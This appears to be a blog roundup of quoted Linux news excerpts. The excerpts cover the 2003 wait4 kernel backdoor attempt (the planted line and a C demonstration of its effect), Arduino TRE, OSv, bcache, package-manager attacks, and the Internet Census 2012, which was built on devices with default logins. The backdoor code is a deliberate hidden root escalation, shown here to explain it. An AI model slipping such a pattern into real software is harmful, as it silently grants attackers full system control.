The Linux Backdoor Attempt of 2003

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) 
     retval = -EINVAL;

via The Linux Backdoor Attempt of 2003.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.

The check should have been current->uid == 0. Sneaky!
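The two forms side by side, as an added example that is not code from the original article or the kernel: a user-space simulation showing that the quoted line overwrites the caller's uid and returns no error, while the comparison leaves it untouched. `struct task`, the `DEMO_*` flag values and the helper names are stand-ins made up for this sketch.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed stand-ins for the kernel's __WCLONE / __WALL and task struct. */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u
struct task { unsigned int uid; };

/* The check as quoted on the page: '=' stores 0 in uid. The assignment
   evaluates to 0 (false), so retval is never set and the call looks normal. */
static int check_as_submitted(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The comparison the line appears to make. Taking the task as const means
   an accidental '=' here would be rejected by the compiler. */
static int check_with_comparison(const struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Run each variant for a caller with the given uid; return the uid afterwards. */
static unsigned int uid_after_submitted(unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    check_as_submitted(&t, options);
    return t.uid;
}

static unsigned int uid_after_comparison(unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    check_with_comparison(&t, options);
    return t.uid;
}

int main(void)
{
    unsigned int flags = DEMO_WCLONE | DEMO_WALL;
    printf("as submitted: uid 1000 -> %u\n", uid_after_submitted(1000, flags));
    printf("comparison:   uid 1000 -> %u\n", uid_after_comparison(1000, flags));
    return 0;
}
```

In review, any write to a credential field inside a condition deserves a second look; const-qualifying pointers that a check only needs to read turns this class of mistake into a compile error.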

Linux-capable Arduino TRE debuts at Maker Faire Rome

As Zoe Romano puts it in an Arduino blog post, “the Arduino TRE is two Arduinos in one.” Basically, the new ARM Cortex-A8-based Sitara AM335x’s job is to run Linux applications and manage the SBC’s PC-style interfaces (video, audio, Ethernet, USB, optional WiFi, etc.), while an Atmel ATmega microcontroller takes care of the SBC’s real-world I/O (analog inputs, digital I/O, PWM outputs, etc.) and handles the interface to shields (Arduino expansion modules) in a fully AVR-compatible manner. Best of all, Romano points out, the 1GHz TI ARM processor offers up to “100 times more performance” than Arduino’s earlier Leonardo and Uno boards, writes Romano.

via Linux-capable Arduino TRE debuts at Maker Faire Rome · LinuxGizmos.com.

What’s unique about the TRE, however, is that its Linux OS runs on an ARM processor that’s truly integrated into the SBC’s basic architecture, as opposed to being a collateral benefit of a WiFi add-on module. As a result, the TRE will support a “full Linux” OS in contrast to the Yun’s Linino OS, a custom version of the lightweight OpenWRT embedded Linux distribution.

Choosing a Journaling File System

A journaling file system is a special type of file system that maintains a tracking file, called a journal. The journal enables the system to repair any inconsistencies that may arise as a result of a system halted abnormally. It does this by keeping track of changes that are made before committing them to the main file system. In the event that the computer is not shut down properly, any data loss can be recreated. This type of file system is therefore less likely to suffer from corruption, and brings file systems back online quickly.

via Choosing a Journaling File System – Linux Links – The Linux Portal Site.

OSv, a new open-source operating system for virtual machines

These days, most applications running on virtual machines in the cloud run on top of Linux. We all love Linux, but as an all-encompassing operating system for everything from phones to supercomputers, Linux was never really designed for virtual machines; it is big and complex, and it offers features (such as multi-user and multi-process) which are today made redundant by the hypervisor and slow it down. Linux’s APIs are many times set in stone by decades of legacy code. All these cost in application performance, and make it harder to innovate.

This is why we developed OSv, a new operating system designed to run a single application on a virtual machine. As it runs a single application there is no need for kernel-userspace isolation, reducing context switch costs and unnecessary copying. A design from scratch allowed us to experiment with new ideas like lock-free mutexes (solving the Lock-Holder Preemption problem that plagues operating systems on virtual machines), extremely fast context switches, Van Jacobson’s network channels (see http://www.lemis.com/grog/Documentation/vj/lca06vj.pdf), and more. Also, OSv is released under the more permissive BSD license (not GPL like Linux), is tiny compared to Linux, and takes less than one second to boot and start the user’s application.

via Announce: OSv, a new open-source operating system for virtual machines.

Presentation slides can be seen here.

Linux-based autopilots target commercial UAVs

The computers offer pre-installed flight control and mission software built upon the Linux-based AirwareOS platform. The software is provided under a royalty-free license that enables modification, extension third party software, and inclusion in proprietary products, says the company. The Linux-based software is written in C++, and provides a single hardware-independent Unified Autopilot Interface (UAI) API to the INS/GPS solution, system status, sensor data, actuators, datalink radio, and payloads.

via Linux-based autopilots target commercial UAVs · LinuxGizmos.com.

The evolution of the NSA’s XKeyscore

In the current generation of Narus’ system, the processing systems run on commodity Linux servers and re-assemble network sessions as they’re captured, mining them for metadata, file attachments, and other application data and then indexing and dumping that information to a searchable database.

via Building a panopticon: The evolution of the NSA’s XKeyscore | Ars Technica.

Attacks on Package Managers

To provide an example of the sorts of attacks an attacker can launch on package managers, this page describes an example attack called a replay attack. Other attacks are described on a separate page.

via Attacks on Package Managers.

Here’s a piece of advice I always adhere to for any kind of upgrade.

Manually update your systems (and local mirror caches). Know when package updates become available and what the versions should be. Manually verify and install the updated packages (or add them to your local mirror cache that your systems update from) rather than relying on automated updates. We have observed mirrors many months out of date for some distributions, so you should check periodically that your mirror is being updated.

Linux Group Tests

The original objective in starting the compilation was to dispel the FUD that Linux does not have the necessary software to compete with Windows. Over time, the aim of the compilation was to enable Linux users, whatever their level of computing experience, to identify software of all types that is worth exploring. With the huge range of open source software available, there is simply not enough time for users to evaluate every application even within a single category of software.

The compilation is being frequently updated and new articles added on a regular basis.

via Linux Group Tests – Part 1 – Linux Links – The Linux Portal Site.

bcache

Bcache is a Linux kernel block layer cache. It allows one or more fast disk drives such as flash-based solid state drives (SSDs) to act as a cache for one or more slower hard disk drives.

Hard drives are cheap and big, SSDs are fast but small and expensive. Wouldn’t it be nice if you could transparently get the advantages of both? With Bcache, you can have your cake and eat it too.

via bcache.

Internet Census 2012

Abstract: While playing around with the Nmap Scripting Engine (NSE) we discovered an amazing number of open embedded devices on the Internet. Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials. We used these devices to build a distributed port scanner to scan all IPv4 addresses. These scans include service probes for the most common ports, ICMP ping, reverse DNS and SYN scans. We analyzed some of the data to get an estimation of the IP address usage.

All data gathered during our research is released into the public domain for further study.

via Internet Census 2012.